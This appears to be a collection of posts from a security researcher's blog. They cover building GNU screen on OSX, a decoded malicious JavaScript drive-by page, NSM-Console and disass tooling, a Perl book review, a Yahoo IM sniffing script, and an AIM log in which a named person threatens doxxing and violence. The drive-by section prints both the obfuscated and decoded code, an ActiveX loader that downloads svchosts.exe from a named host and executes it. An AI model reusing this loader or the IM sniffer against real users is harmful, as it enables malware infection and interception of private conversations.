Screen in an amazing tool. The latest version from CVS adds an amazing feature to allow you to split screens vertically (previously you could only split horizontally), which is extremely nice if you have a widescreen monitor. The only problem is that the patch isn’t yet included in MacPorts or Fink for this feature.

Here’s how to fetch it from source, patch it and build it yourself on OSX (tested on 10.5.3). First we need to check out the source:

shell> cvs -z3 -d:pserver:anonymous@cvs.savannah.gnu.org:/sources/screen co screen

Next, we need to manually apply the patches from MacPorts (assuming you’ve used MacPorts before). First change into the screen directory and apply the following 3 patches:

shell> cd screen/src
shell> patch < /opt/local/var/macports/sources/rsync.macports.org/
release/ports/sysutils/screen/files/patch-maxargs
shell> patch < /opt/local/var/macports/sources/rsync.macports.org/
release/ports/sysutils/screen/files/patch-windowsize
shell> patch < /opt/local/var/macports/sources/rsync.macports.org/
release/ports/sysutils/screen/files/patch-pty.c

(Each of those should be on one line, I had to split them up to make the wrapping better).

Now, configure using the same method as the macports:

shell> ./configure --enable-locale --enable-telnet --enable-colors256 --enable-rxct_osc

From there, you should be able to do a make and make install to get your screen up and running. Vertical-split is bound to ctrl+a – |  (control-a and pipe) (substitute whatever your bind key is for ctrl+a). Then you can use ctrl+a – :resize <x> to resize the window, where <x> is x%, -x, +x or x. Here’s a screenshot of it in action:

Scholar was kind enough to allow me to post his/her obfuscated javascript. Here’s a quick rundown. The page was originally this:

<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>
str = "qndy`mh)(:gtobuhno!qndy`mh)(!zw`s!doeds!<!enbtldou/bsd`udDm
dldou)&nckdbu&(:doeds/rdu@uushctud)&he&-&doeds&(:doeds/rdu@uushc
tud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892
@,1&*#1B#*&15G&*#B38#*&D27&(:usx!zw`s!`rp!<!doeds/Bsd`udNckdbu)
&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(:w`s!`rr!<
!doeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-
&&(:w`s!`rru!<!doeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&
-&&(:usx!z!`rru/uxqd!<!0:`rp/nqdo)&F&*#D#*&U&-&iuuq;..vn
smebihodrdvshudsr/bnl..mn`e/qiq&-g`mrd(:`rp/rdoe)(:!`rr
u/nqdo)(:`rru/Vshud)`rp/sdrqnordCnex(:w`s!hlx`!<!&/..//..r
wbinrur/dyd&:`rru/R`wdUnGhmd)hlx`-3(:`rru/Bm
nrd)(:|!b`ubi)d(!z|usx!z!`rr/ridmmdydbtud)hlx`(:!|!b`ubi
)d(!z||b`ubi)d(z||";
str2 = "";
for (i = 0; i < str.length; i ++) { str2 =  str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>

str2 now contains the de-obfuscated javascript, which after inserting line breaks, looks something like this:

poexali();
function poexali() {
 var ender = document.createElement('object');
 ender.setAttribute('id','ender');
 ender.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
 try {
  var asq = ender.CreateObject('msxml2.XMLHTTP','');
  var ass = ender.CreateObject("Shell.Application",'');
  var asst = ender.CreateObject('adodb.stream','');
  try {
   asst.type = 1;
   asq.open('GET','http://worldchinesewriters.com//load.php',false);
   asq.send();
   asst.open();
   asst.Write(asq.responseBody);
   var imya = './/..//svchosts.exe';
   asst.SaveToFile(imya,2);
   asst.Close();
  } catch(e) {}
  try {
   ass.shellexecute(imya);
  } catch(e) {}
 }catch(e){}
}

Which, as Scholar pointed out in his/her original email, attempts to download hxxp://worldchinesewriters.com/load.php and save it into the local file “svchosts.exe”, then execute the file.

Super-quick post, since lately I seem to be a tad verbose. What “svchosts.exe” does is left as an exercise to the reader

UPDATE: Sorry about the RSS confusion with this post, it’s being very strange. I hate WordPress binding “publish” to Ctrl+P

Anyone that might have read my blog for a long time might remember this post about how I do GTD (Getting To Done) on my machine(s). Well, I decided it’s been quite a while since I’ve talked about that, so I’ll go through some of my workflow, tools and quirks.

If you read my blog soley for security content, you can skip this post Personally I like to read other people’s workflows/setup to see if there is an interesting way I can fit useful tools into my own setup. Anyhow, on with the details

I have 3 machines that I primarily use. My main machine is a MacBook Pro with an attached Dell LCD monitor running OSX (what else?), the second machine is a Dell Optiplex tower running Ubuntu 8.04. The third machine is a Dell 610 laptop that dual-boots Hex and Windows. Here’s a picture of my default setup on the machines:

OSX

Ubuntu

Hex

Most of my work is done on the MacBook (my personal machine, not supplied by work), I use the Ubuntu machine for tasks that span multiple days, so I can leave a screen term logged in and attach/detach whenever I need to take my laptop home. The Hex machine is mainly used for security purposes, packet analysis, nsm-console development testing, etc.

I like to keep a pretty clean desktop, clutter really tends to irritate me. I try as hard as I can to separate everything that would be on the desktop into either a “papers”, “media”, “code” or “misc” folder. In the previous post about GTD, I mentioned that we use the Mantis ticketing system to keep track of administration tickets. We still use Mantis, just recently upgraded, you can check out a shot here:

If my firefox looks a little strange, it’s because I use the vimperator extension to give firefox Vim-like keybindings and layout. It helps someone who spends a large amount of time in a vim editor to transition quickly between text editing and web-browsing. Speaking of text editing, I absolutely love MacVim and really recommend it to anyone using OSX who likes Vim:

I’ve also transitioned from Mutt to Thunderbird, mostly because Mutt’s 2-way IMAP settings are not so great if you have to check mail between multiple computers. I use the pre-release muttator extension to give Thunderbird mutt-like keybindings:

I use the standard GTD folder naming, which mostly consists of “Inbox”, “Archive” and “Do” folders. (I hope the idea behind each folder is obvious). I still use Gmail for personal email, but can’t access it from inside the work network over POP3 or IMAP due to firewall restrictions, so I use the web client.

Instead of using iCal for meetings, like I was doing, I moved to using Google Calendar, which is aided by the notifier for events, so I don’t have to set up reminders for meetings. It also lets me share my wife’s calendar and see what she’s up to As well as google calendar, I also use gReader to browse my 222 RSS subscriptions, nothing else comes close as far as I’m concerned (yay more vim-like keybindings).

I do still use a moleskine, but lately I’ve transitioned to the next larger notebook (5′ x 7′), so that I can write out larger notes and more information (writting assembly notation in a tiny notebook gets annoying). I make use of the same sort of TODO list as in my last post ( – for an incomplete task, + for a completed task ). I take it to all meetings I go to and doodle in it sometimes I still use the smaller book for lists and small notes.

One of the things I’ve found is that despite having a widescreen 2nd monitor, the ‘wide’ part doesn’t really help any for what I do, so I flipped the monitor up to make it vertical, which is really helpful for using IDA, since I can see more instructions at once, here’s the malware I’ve working on at the moment:

Since I normally have at least 1 VM running, as well as mail, 1 or 2 browsers, X11, Adium, MacVim and any other number of things, I cut down on RAM usage by using cmus (hurray more vim keybindings) for a music playing instead of iTunes (which is such a memory hog for simple things). I also use irssi instead of a graphical client for IRC since it’s a little lighter weight:

I rigged Quicksilver up to the cmus-remote command-line utility so I can have system-wide keybindings for player control, pretty much the other thing I use iTunes for anymore is heavy music folder management (I do like that feature). I spend a great deal of time at the command-line, if you’re interested in configuration files, you can find my zshrc, screenrc, vimrc, gvimrc and nsmcrc at dotfiles.org.

Finally, here’s an overview of my basic whole-desktop setup:

My GTD process has kind of evolved into a stripped down version of the multiple-step instructions from some of the more famous practitioners (receive email, process until inbox has 0 messages, perform actions). I make up a large amount of time by unifying my tools around a certain look and feel (Vim-keybindings for everything), allowing my brain not to have to shift gears for different tasks. By keeping a strict set of rules on which application goes where (as in for virtual spaces), I always know where I can find what I am looking for (application wise). In my opinion, this adds to my efficiency more than any particular tool could have.

Well, that’s about it, hopefully you found something interesting in this post. If you have a neat tool or helpful suggestion, leave a comment below (especially if it has Vim keybindings )

Lo! I still live! I apologize for the very very long delay that I’ve been putting everyone through lately, I’m sure I was terribly missed *Ahem*, anyway, on with the post:

Introduction

Firstly, malware analysis and reverse engineering has always been incredibly interesting to me and I noticed that ever since my OEP finding tutorial for UPACK, I’ve also gotten a lot of google searches for “how to reverse malware” and other such things, so, I figured I’d share my meager knowledge, seeing as how other blogs have been so helpful thus far, and they always say the best way to learn something is to teach it. I decided that it would be cool to start a series about analysis from start to finish, explaining how I analyze the file. Anyhow, enough of my rambling, on with the analysis! Continue Reading »

First off, I apologize for the lack of posts here lately, I’ve been trying to come up with something good to post, because I’m just not a fan of rehashing things other blogs post, or commenting on news stories. Hopefully I’ll be able to contribute more soon

Now down to the real post, NSM-Console 0.7 has been released, there are a lot of cool features in this release, but first, go download NSM-Console!

As always, you can check out the TODO and CHANGELOG from svn.

Now, let’s cover some of the newest features in this release:

Encode/Decode enhancements
The encode and decode methods have had a few enhancements added to them, most notably, you can now specify a file to encode or decode, instead of specifying just a string, so you could do:

nsm> encode -f base64 testfile.txt
Encoding ascii --> base64...
Output ([]'s added to show beginning and end):
[TlNNLUNvbnNvbGUgaXMgYXdlc29tZSwgeW91IHNob3VsZCB1c2UgaXQgOikK]

Also, you can specify a variety of hex encodings, because I was noticing that it was delineated in a variety of ways, \x, space (or not delineated at all). I’ve also added the default hex and binary methods, so you don’t have to specify endianness, they default to little-endian.

IP->ASN mapping
As per Scholar’s suggestion, there is now both a module and a command for translating an ip into it’s ASN,  you can either use the module to get a listing from each IP in the pcap, or use the below command to get the ASN for just one address:

nsm> ip2asn 203.223.154.86
Bulk mode; whois.cymru.com [2008-04-27 17:53:32 +0000]
17992   | 203.223.154.86   | AIMS-MY-DIA-AS AIMS Data Centre

Thanks to Team Cymru for their ASN servers

‘Print’ command supports flags
The print command now supports printing TCP flags, still uses Scholar’s pcapparser library.

New command: ‘iplist’
Generate a list of the ips in a pcap file, sorted by the number of occurrences in the file, see below:

nsm> iplist
=== IP list for data.pcap ===
192.168.1.123   1507
64.233.179.109  260
192.168.1.136   141
204.245.162.17  126
216.178.38.133  102
208.67.217.230  92
209.225.0.103   88
.. etc etc

Pipes now supported
One feature geek00l has been bugging me about is getting piping to work in the nsm shell, I’m happy to announce that they finally work, you might run into a few bugs (broken pipes with less), but for the most part they work, now output can be piped into files and programs:

nsm> p -x 1-* | less
(display all the packets and hex output, piped into less)
nsm> iplist > iplist.txt
(output the list of ips into iplist.txt)
nsm> ip2asn 203.223.154.86 >> iplist.txt
(append the ip2asn output to iplist.txt)

Etc, etc, you get the idea. The ‘<‘ pipe hasn’t been implemented yet, perhaps if it’s needed in the future.

New modules, bro-ids-connection and yahsnarf
Geek00l committed his bro-ids-connection module for generating only connection information from a pcap, a yahsnarf module was also committed, to enable extract yahoo IM conversations from a pcap file. Thanks geek00l!

Automatic updating of NSM-Console
Users desiring to be on the bleeding edge of NSM-Console development (is there anyone that actually desires this? :P) can now use the “update” command from within NSM-Console to automatically update from the latest subversion commit. You can also use the -v for verbose output, see below:

nsm> update -v
Updating NSM-Console from svn...
Fetching newest revision from svn...
etc, etc

Still a few kinks to work out, but should work pretty well.

Bugfixes
I fixed some bugs related to gzip’d pcap files as well as some bugs in the encode and decode methods. I also introduced some bugs (hurray!) with pipes, but it’s still usable.

Like I always say, check out the full TODO and CHANGELOG for complete details, and send me any feedback you have

I’ve been digging into the world of exploit writing lately, working on Defcon‘s previous year’s CTF qualification programs, I ran into Atlas’ presentation on “Kiddie to Hacker in 5 sleepless nights”, which talks about some of his mindset when he first got into binary exploitation.

Atlas has written a tool call disass to aid in disassembly and analysis, which is a really cool tool, but can be kind of annoying to get running on different operating systems thanks to Python’s amazingly helpful error messages </sarcasm>

Firstly, make sure you install the dependencies, Python (duh), psyco, atlasutils (from Atlas’ blog), libdisassemble and vtrace (from the Kenshoto guys). Then, install disass-cli (also from Atlas’ blog) just like you would any other python program. You might need to symlink /usr/local/bin/python to /usr/bin/python since disass-cli’s sharp-bang is hardcoded for /usr/bin/python

The first time you run disass-cli, you’ll probably hit this error:

# disass-cli
Traceback (most recent call last):
File "/usr/local/bin/disass-cli", line 3, in <module>
from disass3 import *
File "/usr/local/lib/python2.5/site-packages/disass3/__init__.py", line 105, in <module>
import bsddb
File "/usr/local/lib/python2.5/bsddb/__init__.py", line 51, in <module>
import _bsddb
ImportError: No module named _bsddb

Cryptic eh? Googling is not so helpful on this one (“Recompile Python!”) Well, to fix the problem on FreeBSD, you need to install /usr/ports/databases/py-bsddb, which will rebuild Python with the necessary libraries, easy fix.

On OSX, you’ll need to download the newest Python distro .dmg from python.org (which will have the correct libraries). Now you can update the symlink by doing:

# rm /usr/bin/python
# ln -s /Library/Frameworks/Python.framework/Versions/2.5/bin/python /usr/bin/python

as root. Now you should be able to reinstall the dependencies for disass using the newer Python distribution and disass-cli shouldn’t complain anymore, silly broken Apple versions of Python.

Note: Alternatively, you can edit the disass-cli Python file (in /usr/local/bin/disass-cli) to use the Python distribution you installed directly without changing the symlink, that way everything else still uses Apple’s version of Python (don’t forget to install the dependency libraries for the newer version of Python also).

Hope this helps someone, exploit writing is new to me, coming from more of a network-side, always fun to learn new things

Recently I was contacted by a publisher from Packt publishing about reviewing a couple of books, after a long time (sorry I took so long!) I’m finally finished with my review of the first book, Catalyst: Accelerating Perl Web Application Development. Note that while I was asked, I wasn’t paid for this review, this is my personal opinion.

Firstly, for anyone unfamiliar with Catalyst, Catalyst is a MVC (Model-View-Controller) framework using Perl, for anyone familiar with Ruby on Rails, Catalyst is extremely similar.

The book is written by Jonathan Rockway, who is one of the core team members of the Catalyst team, which gives the book a solid technical background. The book’s text is easy to read and understandable.

Catalyst starts by giving a brief introduction to the MVC methodology and instructions for downloading and installing the Catalyst run-time. One thing to note is that this book is not for readers new to Perl, the book assumes you have a solid knowledge of Perl intricacies and experience using CPAN, which is required to install the multitudes of modules required for Catalyst development. I found that a certain level of problem-solving was required, as not all CPAN modules installed cleanly. I had to force-install a few of the modules and manually resolve a number of dependencies in order to get all the required modules. This barrier to entry might discourage some beginners just starting out with Perl and Catalyst. Other than that, all the installation instructions were very clear.

Developers don’t learn very well with just theory, so Catalyst does a good job of providing a sample application to develop and extend throughout the book. The bulk of the development centers around creating an Address Book application, which is then extended to have features like authentication and AJAX later on during the book. Personally, I’m happy the same application is used, rather than switching applications every chapter. The book does change applications for a couple of chapters (which I find is good, to give a different app’s perspective), then returns to the first application afterwards.

The book discusses a lot of the cool features of Catalyst, such as FormBuilder, templates, REST APIs, Jemplates, AJAX and RSS feeds. The book describes ways to use these features to help speed up development and move away from repetitive code creation. In chapters 8 and 9, testing and deployment are discussed. Personally, I would have liked to see the testing and deployment chapters moved up and integrated into the earlier chapters to enforce a methodology that includes testings from the beginning of development, but I can understand moving it to the end to make entry into the framework a little easier.

One other thing to note, as with almost any programming book, syntax and spelling errors can be killer when attempting to replicate code written in a book, the Catalyst book has a list of errors pertaining to the code in the book, which caused me a great deal of frustration until I looked up the errata. I recommend that anyone use the code example either downloaded from the website or directly from the book take a look and make sure they get the correct syntax. The only other thing I would have liked to see was a chapter on security concerns of the Catalyst framework (being concerned about security myself), I was disappointed they didn’t show up in the book, perhaps in the next edition. I have noticed (from googling for errors I ran into), that Jonathan is very vocal on forums about helping people, so I have no doubt that the syntax errors will be corrected in a future edition

Alright, enough blathering from me, here’s the short and sweet summary: This book is great for Perl or Ruby programmers who are already familiar with MVC development and are interested in the Catalyst framework. The book is not exhaustive by any means, and is not overly long (I would say this is a good thing), it provides a very solid foundation to work with, and a developer should be able to develop his/her own app after reading it. If you’re a Ruby developer interested in a Perl alternative to Rails, or if you’re a Perl developer jealous of Rails, I encourage you to check it out.

P.S. I have also posted this review to Amazon here.

Remember way back, when I released Aimsnarf? Well, it turns out that people were interested in one for Yahoo IM, so I’m happy to present Yahsnarf, the Yahoo messenger sniffing script.

You can download the script on the yahsnarf project page.

Yahsnarf requires Ruby, ruby-pcap and bit-struct (Thanks Matasano for introducing me to bit-struct, made this script take about 1/4rd the time to write)

I’m also currently working on an NSM-Console module for Yahsnarf.

This script is a little different than Aimsnarf, mostly because Aimsnarf was the first program I ever wrote in Ruby, so it tended to be just a little rusty, without the best design practices. For one, Yahsnarf is way smaller than Aimsnarf (70 lines to around 150), and Yahsnarf follows an object-oriented design. Enough of that, here’s what you can expect to see:

shell> sudo ./yahsnarf.rb -i en1
Use '-h' to display usage
Capture/Decoding...
buddy1 --> buddy2: This is a test of yahsnarf
buddy2 --> buddy1: A test this is of yahsnarf; it's awesome!
buddy1 --> buddy2: thanks for the help :)

You can also use ./yahsnarf.rb -r <pcapfile> to read and extract from a network capture file.

Pretty simple eh? Replace buddy1 and buddy2 with the screen names of the conversationalists. There are a few issues I’m still working out, like usernames not always showing up (they could for the most part). Also, this obviously does not work on encrypted messages (OTR or otherwise), so if you value your privacy, use encryption.

Remember, don’t ever say anything over IM that you wouldn’t mind the world knowing, you never know who could be listening in

In conclusion, I’d also like to thank Yahoo, for making their protocol so much less of a pain to decode than AOL’s.

For people who follow the McGrewSecurity.com blog by Wesley McGrew, you are no doubt familiar with an “internet user” by the name of Yousif Yalda. For a little background, take a read on Wesley’s post on some of the “business tactics” of Yousif.

Seeing as how this is the internet, and we’re all entitled to our opinion, I posted my own opinion as a comment on the blog, what follows is an AIM coversation with Yousif about my comment. Entirely uncut and unedited (I replaced foul language with “****”). I think the security community should know. Without further ado:

11:32:02 PM Yousif: .
8:59:51 AM Lee: ?
11:20:17 AM Lee: You IM’d me?
11:20:25 AM Yousif: Yup
11:20:40 AM Yousif: So why exactly did you say what you said on Wesley’s post about me?
11:21:00 AM Lee: Because I had seen some of the posts you had posted in the mailinglists that I read
11:21:09 AM Yousif: Right..
11:21:15 AM Yousif: Go ahead and support yourself.
11:21:24 AM Yousif: I want to know what’s so noobish about my posts.
11:21:47 AM Lee: I didn’t say that they were “noobish”
11:22:21 AM Yousif: You said I needed attention?
11:22:22 AM Yousif: How so?
11:22:47 AM Yousif: I merely asked for views and opinions to be expressed amongst what I had linked.
11:22:48 AM Lee: your mailing list post seemed more like shameless self-promotion
11:23:07 AM Yousif: No, you’ve just got the wrong idea.
11:23:24 AM Yousif: Btw, if you didn’t, I’m only 17 and I’m managing x1000 more than you ever can.
11:23:35 AM Yousif: So you need to learn to shut your mouth and think about what you say next time.
11:23:43 AM Lee: you have no idea how much I manage..?
11:23:53 AM Yousif: It’s been barely an entire year for me in web application security..
11:23:59 AM Yousif: All I’ve been doing is trying to learn and contribute.
11:24:12 AM Yousif: Dude, I’m a nice ***ing guy and I work hard, Wesley is an idiot.
11:24:29 AM Yousif: We were cool to a point until he got upset because I stopped talking to him.
11:24:37 AM Yousif: The information he provided is false and was photoshopped..
11:24:39 AM Lee: Wesley isn’t an idiot, I hardly believe that’s true
11:25:06 AM Yousif: Those screenshots; only one is true, the FTP screenshot because I sent him that when we were discussing how to implement SSL in a specific manner.
11:25:11 AM Yousif: The rest is garbage.
11:25:43 AM Lee: Why should you care what he posts then? Why not just ignore it?
11:25:58 AM Yousif: Don’t act stupid. You want me to drop YOUR docs?
11:25:59 AM Yousif: Do you?
11:26:09 AM Yousif: You want to appear as a top-page result in Google?
11:26:10 AM Lee: “drop my docs”?
11:26:12 AM Yousif: I don’t think so.
11:26:16 AM Yousif: Aww how cute.
11:26:20 AM Yousif: You don’t know what that maens.
11:26:21 AM Yousif: means*
11:26:23 AM Yousif: Exactly.
11:26:27 AM Yousif: Your pure Whitehat.
11:26:33 AM Yousif: You don’t even know basic terms of a black hat hacker..
11:26:34 AM Lee: Pardon me for not being familiar with your slang
11:26:40 AM Yousif: I was one, and I’m trying to be clean.
11:26:50 AM Yousif: It means I’ll post information about you.
11:26:53 AM Yousif: Negative information
11:27:05 AM Yousif: Where you live, number, and a lot of stuff that isn’t public.
11:27:08 AM Lee: so, is that supposed to scare me?
11:27:16 AM Yousif: That’s a question only.
11:27:16 AM Lee: where I live and my number is public anyhow
11:27:26 AM Lee: knock yourself out
11:27:34 AM Yousif: Oh, how cool would it be for me to automate something to call you every couple of seconds?
11:27:39 AM Yousif: Hmm, that sounds peaceful..
11:27:42 AM Yousif: Be realistic here.
11:27:51 AM Yousif: No one wants that type of information out like that especially as such a post.
11:28:03 AM Yousif: Ignoring it doesn’t make it go away.
11:28:19 AM Yousif: It simply ruins my reputation, and I’ve done nothing to have that going for me.
11:28:42 AM Yousif: It also doesn’t help when you don’t have a factual clue about me and you go and post that comment
11:28:49 AM Lee: my personal information is widely available on the internet, I don’t think a post by you is really going to change that
11:29:07 AM Yousif: Do you know what happens after you drop someone’s dox?
11:29:12 AM Yousif: Dude, it goes into EFFECT.
11:29:25 AM Yousif: You’ve got a number, well I’ll threaten you, that’s how the game is played.
11:29:34 AM Yousif: You’ve got an address, I’ll come over and stab you.
11:29:36 AM Yousif: It’s common ****.
11:29:55 AM Lee: are you aware that this is a record of threat, and that it can be used as legal evidence of that fact?
11:30:17 AM Yousif: Not really, genius.
11:30:24 AM Yousif: I showed you that it was an example of what that term meant.
11:30:27 AM Yousif: I can do the same as he had done but instead provide valid information supporting my post, but I’d rather not because I’m not here to dual with anyone.
11:30:52 AM Lee: if you’re not here to “dual” with anyone, why the defensive and attacking attitude?
11:31:18 AM Yousif: You posted a negative remark about me, how can I be cool with that; especially when it’s not true.
11:31:50 AM Yousif: Attend a conference and talk to me once, we’ll see who’s “attention-needy”.
11:31:57 AM Lee: it’s a blog, it’s my opinion, it’s the internet, opinions should be respected
11:32:28 AM Lee: if you don’t agree, ignore it
11:32:45 AM Yousif: Again, it’s not something that can be ignored..
11:32:47 AM Yousif: You know that.
11:33:10 AM Lee: I believe it’s quite ignorable
11:33:36 AM Yousif: It’s like saying “I’ll drop your docs and mass spam it across a HUGE text file with emails so everyone can see this”.
11:34:28 AM Lee: and like I was saying, personal information for me is already easily accessible on the internet
11:35:28 AM Lee: from what I can tell, it looks like similar people have the same opinion as me, why not go bother them?
11:35:58 AM Yousif: I’m not bothering you, I’m making you feel very stupid for what you had to say.
11:36:16 AM Yousif: You also can’t understand what dropping your docs mean after I told you what it is, along with examples.
11:36:20 AM Lee: I’m not feeling stupid
11:36:49 AM Yousif: Yes, you are. You respond back with remarks that make no sense, but instead go in a cycle of bull****.
11:37:11 AM Lee: alright, what remarks need clarification then?
11:37:22 AM Yousif: Yes, genius your information is public, but there are private information I can get against you, post it and tell people to harass and threaten you a million times.. Now do you understand?
11:37:42 AM Yousif: You keep thinking that your information will be there for eyes to read.. instead it’ll be used.
11:37:51 AM Lee: what makes you think people will want to threaten and harass me?
11:37:53 AM Yousif: But that’s just an example to clarify your misconception.
11:38:06 AM Yousif: It’s a game, it’s how it’s played.
11:38:08 AM Yousif: Google it.
11:38:47 AM Lee: frankly, I don’t care what you and your buddies are up to with my information
11:39:00 AM Yousif: Anyways, I’m done with you. I was trying to implement some facts to make you more open-minded but I see that your just as wrong as he is, so do what you want, I’ll be seeing you soon.
11:39:40 AM Lee: toodles
Changed status to Idle (11:58:12 AM)

Did I handle that perfectly? Probably not, but that’s the internet. If you’re easily offended by other’s opinions, leave.

I welcome comments